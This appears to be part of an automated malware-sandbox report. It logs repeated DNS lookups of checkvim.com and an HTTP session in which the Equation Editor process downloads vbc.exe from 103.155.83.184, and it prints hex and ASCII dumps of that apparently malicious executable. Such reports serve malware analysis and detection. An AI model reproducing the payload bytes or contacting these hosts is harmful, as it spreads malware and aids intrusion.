                    Sep 28, 2021 06:50:44.243088961 CEST8.8.8.8192.168.2.220x7c94No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:44.913645983 CEST8.8.8.8192.168.2.220x22e6No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:45.527900934 CEST8.8.8.8192.168.2.220xaf08No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:46.180366993 CEST8.8.8.8192.168.2.220xe7edNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:46.855447054 CEST8.8.8.8192.168.2.220xb5d5No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:47.487868071 CEST8.8.8.8192.168.2.220x4469No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:48.142239094 CEST8.8.8.8192.168.2.220x27fcNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:48.814738035 CEST8.8.8.8192.168.2.220x27afNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:49.475914955 CEST8.8.8.8192.168.2.220x5bccNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:50.121701002 CEST8.8.8.8192.168.2.220x584dNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:50.756259918 CEST8.8.8.8192.168.2.220x7e52No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:51.593106031 CEST8.8.8.8192.168.2.220xc11No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:52.364711046 CEST8.8.8.8192.168.2.220x54a8No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:53.292803049 CEST8.8.8.8192.168.2.220x1a9bNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:53.947679043 CEST8.8.8.8192.168.2.220xedb1No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:54.610177994 CEST8.8.8.8192.168.2.220xdf9eNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:55.233603954 CEST8.8.8.8192.168.2.220x113eNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:55.914731026 CEST8.8.8.8192.168.2.220x8cc3No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:56.553797007 CEST8.8.8.8192.168.2.220xbae2No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:57.208435059 CEST8.8.8.8192.168.2.220xf818No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:57.814928055 CEST8.8.8.8192.168.2.220x90bcNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:58.513585091 CEST8.8.8.8192.168.2.220xd685No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:59.156528950 CEST8.8.8.8192.168.2.220x2384No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:59.811640024 CEST8.8.8.8192.168.2.220xfc87No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:00.464709044 CEST8.8.8.8192.168.2.220xd67aNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:01.118602991 CEST8.8.8.8192.168.2.220xa7e8No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:01.787070036 CEST8.8.8.8192.168.2.220xd14No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:02.437361002 CEST8.8.8.8192.168.2.220x916fNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:03.081188917 CEST8.8.8.8192.168.2.220xbbb4No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:03.737246037 CEST8.8.8.8192.168.2.220x3d1No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:04.384134054 CEST8.8.8.8192.168.2.220xe82eNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:05.019469976 CEST8.8.8.8192.168.2.220x5705No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:05.631485939 CEST8.8.8.8192.168.2.220x3e25No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:06.246737957 CEST8.8.8.8192.168.2.220x70b4No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:06.881524086 CEST8.8.8.8192.168.2.220x7f95No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:07.525409937 CEST8.8.8.8192.168.2.220x7633No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:08.162851095 CEST8.8.8.8192.168.2.220x264cNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:08.768567085 CEST8.8.8.8192.168.2.220x3cd3No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:09.376465082 CEST8.8.8.8192.168.2.220xa48dNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:10.008641958 CEST8.8.8.8192.168.2.220xde0eNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:10.613387108 CEST8.8.8.8192.168.2.220xb4f5No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:11.259166002 CEST8.8.8.8192.168.2.220x8c7bNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:11.848179102 CEST8.8.8.8192.168.2.220xab7bNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:12.473819017 CEST8.8.8.8192.168.2.220x7ce5No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:13.111699104 CEST8.8.8.8192.168.2.220x7348No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:13.746982098 CEST8.8.8.8192.168.2.220xba52No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:14.354599953 CEST8.8.8.8192.168.2.220x23e2No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:14.985114098 CEST8.8.8.8192.168.2.220x4ed0No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:15.652194977 CEST8.8.8.8192.168.2.220xd6d7No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:16.271156073 CEST8.8.8.8192.168.2.220x76b5No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:16.878494978 CEST8.8.8.8192.168.2.220x4a4dNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:17.515573025 CEST8.8.8.8192.168.2.220x65eeNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:18.112341881 CEST8.8.8.8192.168.2.220x718bNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:18.758816957 CEST8.8.8.8192.168.2.220x83b4No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:19.371682882 CEST8.8.8.8192.168.2.220x62c8No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:20.010968924 CEST8.8.8.8192.168.2.220xb755No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:20.662913084 CEST8.8.8.8192.168.2.220xdbbbNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:21.281076908 CEST8.8.8.8192.168.2.220x2fbeNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:21.908377886 CEST8.8.8.8192.168.2.220xccbeNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:22.536520004 CEST8.8.8.8192.168.2.220x113eNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:23.187026024 CEST8.8.8.8192.168.2.220xe199No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:23.800335884 CEST8.8.8.8192.168.2.220x3f8No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:24.439459085 CEST8.8.8.8192.168.2.220x4107No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:25.053002119 CEST8.8.8.8192.168.2.220x74acNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:25.677412033 CEST8.8.8.8192.168.2.220xe2bNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:26.308763981 CEST8.8.8.8192.168.2.220xa16aNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:26.982305050 CEST8.8.8.8192.168.2.220x9490No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:27.600348949 CEST8.8.8.8192.168.2.220xc414No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:28.193268061 CEST8.8.8.8192.168.2.220x7ac6No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:28.808218002 CEST8.8.8.8192.168.2.220x132cNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:29.410531044 CEST8.8.8.8192.168.2.220x4a40No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:30.026681900 CEST8.8.8.8192.168.2.220xce0aNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:30.642488003 CEST8.8.8.8192.168.2.220x26a4No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:31.277529955 CEST8.8.8.8192.168.2.220xfbb5No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:31.911752939 CEST8.8.8.8192.168.2.220xfb02No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:32.569732904 CEST8.8.8.8192.168.2.220x7463No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:33.175820112 CEST8.8.8.8192.168.2.220x214eNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:33.823859930 CEST8.8.8.8192.168.2.220x4df1No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:34.446486950 CEST8.8.8.8192.168.2.220xdb50No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:35.073288918 CEST8.8.8.8192.168.2.220x2a25No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:35.688777924 CEST8.8.8.8192.168.2.220x64feNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:36.340655088 CEST8.8.8.8192.168.2.220x785No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:36.977107048 CEST8.8.8.8192.168.2.220xbf3cNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:37.583689928 CEST8.8.8.8192.168.2.220x3eeaNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:38.227706909 CEST8.8.8.8192.168.2.220xfb53No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:38.848547935 CEST8.8.8.8192.168.2.220xeff0No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:39.471940994 CEST8.8.8.8192.168.2.220x2267No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:40.437524080 CEST8.8.8.8192.168.2.220x97dfNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:41.041893959 CEST8.8.8.8192.168.2.220x7445No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:41.645601034 CEST8.8.8.8192.168.2.220x83b1No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:42.304616928 CEST8.8.8.8192.168.2.220x1e7fNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:42.928423882 CEST8.8.8.8192.168.2.220x8815No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:43.525496006 CEST8.8.8.8192.168.2.220xe640No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:44.146752119 CEST8.8.8.8192.168.2.220x2d16No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:44.785208941 CEST8.8.8.8192.168.2.220x716fNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:45.422796011 CEST8.8.8.8192.168.2.220xc08No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:46.027328968 CEST8.8.8.8192.168.2.220x6ceaNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:46.652699947 CEST8.8.8.8192.168.2.220x30eaNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:47.281250000 CEST8.8.8.8192.168.2.220x1d51No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:47.912065029 CEST8.8.8.8192.168.2.220x6008No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:48.542418957 CEST8.8.8.8192.168.2.220xd582No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:49.182720900 CEST8.8.8.8192.168.2.220xb3eaNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:49.812793970 CEST8.8.8.8192.168.2.220xbbd0No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:50.428427935 CEST8.8.8.8192.168.2.220x21ceNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:51.094007015 CEST8.8.8.8192.168.2.220x5fe2No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:51.785337925 CEST8.8.8.8192.168.2.220xcfa8No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:52.404402971 CEST8.8.8.8192.168.2.220x46c7No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:53.032078981 CEST8.8.8.8192.168.2.220xc0b8No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:53.652053118 CEST8.8.8.8192.168.2.220x8d66No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:54.266855001 CEST8.8.8.8192.168.2.220xa872No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:54.898588896 CEST8.8.8.8192.168.2.220xaaacNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:55.501737118 CEST8.8.8.8192.168.2.220xff5eNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:56.284024954 CEST8.8.8.8192.168.2.220x37edNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:56.897857904 CEST8.8.8.8192.168.2.220xff2fNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:57.662775040 CEST8.8.8.8192.168.2.220xd3e9No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:58.280199051 CEST8.8.8.8192.168.2.220x75c9No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:58.900548935 CEST8.8.8.8192.168.2.220x7d4aNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:59.543994904 CEST8.8.8.8192.168.2.220xae13No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:52:00.146327972 CEST8.8.8.8192.168.2.220xc359No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:52:00.787919998 CEST8.8.8.8192.168.2.220x13b0No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:52:01.479352951 CEST8.8.8.8192.168.2.220xc0feNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:52:02.105777979 CEST8.8.8.8192.168.2.220x3493No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:52:02.789148092 CEST8.8.8.8192.168.2.220x4ff9No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:52:03.457667112 CEST8.8.8.8192.168.2.220x3405No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:52:04.060210943 CEST8.8.8.8192.168.2.220x9b70No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)

                    HTTP Request Dependency Graph

                    • 103.155.83.184
                    • checkvim.com

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    0192.168.2.2249165103.155.83.18480C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:21.338944912 CEST0OUTGET /wdc/vbc.exe HTTP/1.1
                    Accept: */*
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                    Host: 103.155.83.184
                    Connection: Keep-Alive
                    Sep 28, 2021 06:50:21.629554033 CEST1INHTTP/1.1 200 OK
                    Date: Tue, 28 Sep 2021 04:50:21 GMT
                    Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/8.0.10
                    Last-Modified: Mon, 27 Sep 2021 22:15:04 GMT
                    ETag: "33600-5cd016dd19714"
                    Accept-Ranges: bytes
                    Content-Length: 210432
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: application/x-msdownload
                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 48 ba 15 60 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 6c 01 00 00 14 0a 00 00 00 00 00 18 1b 00 00 00 10 00 00 00 80 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 a0 0b 00 00 04 00 00 6d 6b 03 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 b1 01 00 4f 00 00 00 2c a9 01 00 3c 00 00 00 00 20 0a 00 b8 75 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 81 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 94 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 80 01 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 20 6a 01 00 00 10 00 00 00 6c 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ef 31 00 00 00 80 01 00 00 32 00 00 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 7c 55 08 00 00 c0 01 00 00 1e 00 00 00 a2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b8 75 01 00 00 20 0a 00 00 76 01 00 00 c0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELH`l@mkO,< u@|.text jl `.rdata12p@@.data|U@.rsrcu v@@
                    Sep 28, 2021 06:50:21.629590034 CEST3INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 33 c0 c2 04 00 c1 e0 04 89 01 c3 83 3d fc 03 4a 00 7e 75 0f 68 60 93 41 00 6a 00 6a 00 ff 15 20 80 41 00 8b 44 24 04 31 06 c2 04 00 33 44 24 04 c2 04 00 81 00 fe 36 ef c6 c3 01 08 c3 55 8b ec b8 28
                    Data Ascii: 3=J~uh`Ajj AD$13D$6U(6mESXV3=J4W8u+VVAVVVV`AAVAVEPVHA=JNuuVPVMAEAEEEy7iE"=JTuHV,Ah
                    Sep 28, 2021 06:50:21.629606009 CEST4INData Raw: 00 85 c0 74 0a e8 30 06 00 00 8b 4d fc 89 08 8b c6 5e c9 c3 6a 0c 68 50 a5 41 00 e8 f6 13 00 00 83 65 e4 00 8b 75 08 3b 35 68 15 4a 00 77 22 6a 04 e8 e7 08 00 00 59 83 65 fc 00 56 e8 ee 10 00 00 59 89 45 e4 c7 45 fc fe ff ff ff e8 09 00 00 00 8b
                    Data Ascii: t0M^jhPAeu;5hJw"jYeVYEEEjYUVuSW=A=AujhYYXJut3@PuVSYuuFVj5Au.j^9Atuh
                    Sep 28, 2021 06:50:21.629622936 CEST5INData Raw: e8 23 11 00 00 59 e8 c6 20 00 00 85 c0 7d 08 6a 09 e8 12 11 00 00 59 53 e8 ca 11 00 00 59 3b c6 74 07 50 e8 00 11 00 00 59 e8 44 20 00 00 84 5d c4 74 06 0f b7 4d c8 eb 03 6a 0a 59 51 50 56 68 00 00 40 00 e8 0c fa ff ff 89 45 e0 39 75 e4 75 06 50
                    Data Ascii: #Y }jYSY;tPYD ]tMjYQPVh@E9uuPAh}5EMPQYYeEE}uP$DEE3@eEnk*xUE3;AtA-rHwjX]A]Dj
                    Sep 28, 2021 06:50:21.919749022 CEST7INData Raw: 3f 89 75 0c 4b 5e 3b de 76 02 8b de 03 4d f8 8b d1 c1 fa 04 4a 89 4d fc 3b d6 76 02 8b d6 3b da 74 5e 8b 4d 0c 8b 71 04 3b 71 08 75 3b be 00 00 00 80 83 fb 20 73 17 8b cb d3 ee f7 d6 21 74 b8 44 fe 4c 03 04 75 21 8b 4d 08 21 31 eb 1a 8d 4b e0 d3
                    Data Ascii: ?uK^;vMJM;v;t^Mq;qu; s!tDLu!M!1K!LuM!qMqINMqINu]}u;MYN^qNqN;Nu`LML s%}uMDD)}u
                    Sep 28, 2021 06:50:21.919792891 CEST8INData Raw: 8b 4d 08 09 59 04 8d 84 90 c4 00 00 00 8d 4f e0 ba 00 00 00 80 d3 ea 09 10 8b 55 0c 8b 4d fc 8d 44 32 fc 89 08 89 4c 01 fc eb 03 8b 55 0c 8d 46 01 89 42 fc 89 44 32 f8 e9 3c 01 00 00 33 c0 e9 38 01 00 00 0f 8d 2f 01 00 00 8b 5d 0c 29 75 10 8d 4e
                    Data Ascii: MYOUMD2LUFBD2<38/])uNK\3uN]K?vj?^EuN?vj?^O;OuB st!\Du#M!NL!uM!Y]OwqwOquuuN
                    Sep 28, 2021 06:50:21.919812918 CEST10INData Raw: 5b 8b 4c 86 14 8d 44 86 10 89 45 f0 8b 00 89 45 f8 85 c9 74 14 8b d7 e8 b8 22 00 00 c6 45 ff 01 85 c0 7c 40 7f 47 8b 45 f8 8b d8 83 f8 fe 75 ce 80 7d ff 00 74 24 8b 06 83 f8 fe 74 0d 8b 4e 04 03 cf 33 0c 38 e8 89 21 00 00 8b 4e 0c 8b 56 08 03 cf
                    Data Ascii: [LDEEt"E|@GEu}t$tN38!NV3:y!E_^[]EM9csmu)=\Jt h\JC#tUjR\JM["E9Xth0AW^"EMHtN38 NV3: EH
                    Sep 28, 2021 06:50:21.919835091 CEST11INData Raw: e8 4a 26 00 00 83 c4 0c 85 c0 74 0f 33 c0 50 50 50 50 50 e8 31 05 00 00 83 c4 14 56 e8 a3 25 00 00 40 59 83 f8 3c 76 38 56 e8 96 25 00 00 83 ee 3b 03 c6 6a 03 b9 f4 e1 41 00 68 8c 87 41 00 2b c8 51 50 e8 bf 24 00 00 83 c4 14 85 c0 74 11 33 f6 56
                    Data Ascii: J&t3PPPPP1V%@Y<v8V%;jAhA+QP$t3VVVVV3hASW%$tVVVVVE4ASW$tVVVVVh h`AWs"2jA;t$tjEP4A6$YP6SA_^[
                    Sep 28, 2021 06:50:21.919857025 CEST12INData Raw: 8b ff 55 8b ec 8b 45 08 a3 fc e1 41 00 5d c3 8b ff 55 8b ec 81 ec 28 03 00 00 a1 30 c6 41 00 33 c5 89 45 fc 83 a5 d8 fc ff ff 00 53 6a 4c 8d 85 dc fc ff ff 6a 00 50 e8 5e 11 00 00 8d 85 d8 fc ff ff 89 85 28 fd ff ff 8d 85 30 fd ff ff 83 c4 0c 89
                    Data Ascii: UEA]U(0A3ESjLjP^(0,ffffffEM0IAj
